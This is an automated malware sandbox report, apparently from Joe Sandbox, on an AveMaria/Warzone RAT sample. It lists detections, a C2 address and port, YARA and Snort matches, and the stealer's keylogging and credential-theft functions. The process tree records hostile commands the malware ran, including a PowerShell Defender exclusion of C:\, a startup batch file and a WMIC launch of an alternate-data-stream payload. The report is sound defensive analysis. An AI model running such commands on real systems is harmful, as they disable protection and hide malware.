Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507

Overview

General Information

Sample Name: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
Analysis ID: 631792
MD5: dabc6f0c75c134e5310ba3526adba833
SHA1: 854ec103a64182c97e8f25e45da04889dbbbf3ff
SHA256: 9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
Tags: exe

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates processes via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Drops script or batch files to the startup folder
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Contains functionality to create processes via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Hides user accounts
Contains functionality to steal e-mail passwords
Found evasive API chain checking for user administrative privileges
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates files in alternative data streams (ADS)
Found decision node followed by non-executed suspicious APIs
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Spawns drivers
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe (PID: 6324 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe" MD5: DABC6F0C75C134E5310BA3526ADBA833)
    • powershell.exe (PID: 6368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • images.exe (PID: 6516 cmdline: C:\ProgramData\images.exe MD5: DABC6F0C75C134E5310BA3526ADBA833)
      • powershell.exe (PID: 6732 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6840 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 7004 cmdline: wmic process call create '"C:\ProgramData:ApplicationData"' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • WmiPrvSE.exe (PID: 6700 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • WmiPrvSE.exe (PID: 6984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup
{"C2 url": "23.227.202.157", "port": 8080}
Source | Rule | Description | Author | Strings
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x178c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x178c8:$c1: Elevation:Administrator!new:
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:

Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x191f0:$c1: Elevation:Administrator!new:

          Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, ProcessId: 6324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

Timestamp: 05/22/22-12:33:29.604971
Source IP: 192.168.2.3
Destination IP: 23.227.202.157
Source Port: 49740
Destination Port: 8080
SID: 2834979
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/22/22-12:33:29.434739
Source IP: 23.227.202.157
Destination IP: 192.168.2.3
Source Port: 8080
Destination Port: 49740
SID: 2841903
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Avira: detection malicious, Label: PUA/Remoteadmin.AR
Source: 4.2.images.exe.22e053f.3.raw.unpack | Malware Configuration Extractor: AveMaria {"C2 url": "23.227.202.157", "port": 8080}
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | ReversingLabs: Detection: 24%
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Virustotal: Detection: 49%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Metadefender: Detection: 20%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | ReversingLabs: Detection: 50%
Source: C:\ProgramData:ApplicationData | ReversingLabs: Detection: 24%
Source: C:\ProgramData\images.exe | ReversingLabs: Detection: 24%
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Joe Sandbox ML: detected
Source: C:\ProgramData:ApplicationData | Joe Sandbox ML: detected
Source: C:\ProgramData\images.exe | Joe Sandbox ML: detected
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.3.images.exe.732cb8.3.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.3.images.exe.732cb8.7.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.2.images.exe.22e053f.3.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.2.images.exe.2ce0000.4.unpack | Avira: Label: TR/Redcap.ghjpt
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CAFC CryptUnprotectData,LocalAlloc,LocalFree | 0_2_02D1CAFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1B15E lstrlenA,CryptStringToBinaryA,lstrcpyA | 0_2_02D1B15E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW | 0_2_02D1A632
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CF58 LocalAlloc,BCryptDecrypt,LocalFree | 0_2_02D1CF58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey | 0_2_02D1CCB4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree | 0_2_02D1CC54

          Exploits

Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Directory created: C:\Program Files\Microsoft DN1
Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb | source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb | source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP | source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb | source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW | 0_2_02D2002B
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040FD34 FindFirstFileExA | 0_2_0040FD34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040FE55 FindFirstFileExA,FindClose | 0_2_0040FE55
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW | 0_2_02D1FF27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA | 0_2_02D19DF6

          Networking

Source: Traffic | Snort IDS: 2841903 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 23.227.202.157:8080 -> 192.168.2.3:49740
Source: Traffic | Snort IDS: 2834979 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.3:49740 -> 23.227.202.157:8080
Source: Malware configuration extractor | URLs: 23.227.202.157
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW | 0_2_02D127D3
Source: Joe Sandbox View | ASN Name: HVC-ASUS HVC-ASUS
Source: global traffic | TCP traffic: 192.168.2.3:49740 -> 23.227.202.157:8080
Source: powershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: sqlmap.dll.4.dr | String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1F23D recv,recv | 0_2_02D1F23D
Source: unknown | TCP traffic detected without corresponding DNS query: 23.227.202.157

          Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\ProgramData\images.exe | Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D189D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx | 0_2_02D189D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices | 0_2_02D1902E

          E-Banking Fraud

Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
